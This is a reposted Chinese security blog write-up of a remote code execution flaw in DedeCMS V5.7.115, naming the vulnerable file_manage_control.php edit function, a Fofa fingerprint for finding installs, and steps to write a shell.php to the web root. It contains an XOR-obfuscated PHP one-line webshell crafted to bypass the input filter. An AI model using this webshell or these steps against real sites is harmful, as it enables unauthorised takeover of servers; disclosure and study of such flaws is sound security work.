【RCE】Dedecms V5.7.115 存在命令执行漏洞

admin 2025年3月18日19:35:56评论15 views字数 467阅读1分33秒阅读模式
【RCE】Dedecms V5.7.115 存在命令执行漏洞
点击上方蓝字关注我们 并设为星标

0x00 前言

    织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,在经历多年的发展,版本无论在功能,还是在易用性方面,都有了长足的发展和进步
Fofa指纹:app="DedeCMS"
【RCE】Dedecms V5.7.115 存在命令执行漏洞

0x01 漏洞分析&复现

该漏洞点位于dede/file_manage_control.php  参数str过滤不完善导致的,可以看到当fmdo=edit执行此代码,Filename跟str均可控

【RCE】Dedecms V5.7.115 存在命令执行漏洞

尝试写入一句话木马

【RCE】Dedecms V5.7.115 存在命令执行漏洞

发现被过滤

往上翻发现过滤代码

【RCE】Dedecms V5.7.115 存在命令执行漏洞

掏出精简的小马子绕过

<?  @("Y;HJ(Z"^"8H;/Z.")(${"~?}$"^"!x8p"}[1]);
【RCE】Dedecms V5.7.115 存在命令执行漏洞

发现csrf_check

【RCE】Dedecms V5.7.115 存在命令执行漏洞

发现对csrf进行检测

【RCE】Dedecms V5.7.115 存在命令执行漏洞

直接找到前台功能点  /dede/file_manage_main.php?activepath=

随便找一个可以编辑的文件

【RCE】Dedecms V5.7.115 存在命令执行漏洞

【RCE】Dedecms V5.7.115 存在命令执行漏洞

抓包

【RCE】Dedecms V5.7.115 存在命令执行漏洞

把shell.php写到根目录

【RCE】Dedecms V5.7.115 存在命令执行漏洞
【RCE】Dedecms V5.7.115 存在命令执行漏洞

 

原文始发于微信公众号(星悦安全):【RCE】Dedecms V5.7.115 存在命令执行漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月18日19:35:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【RCE】Dedecms V5.7.115 存在命令执行漏洞https://cn-sec.com/archives/3854641.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息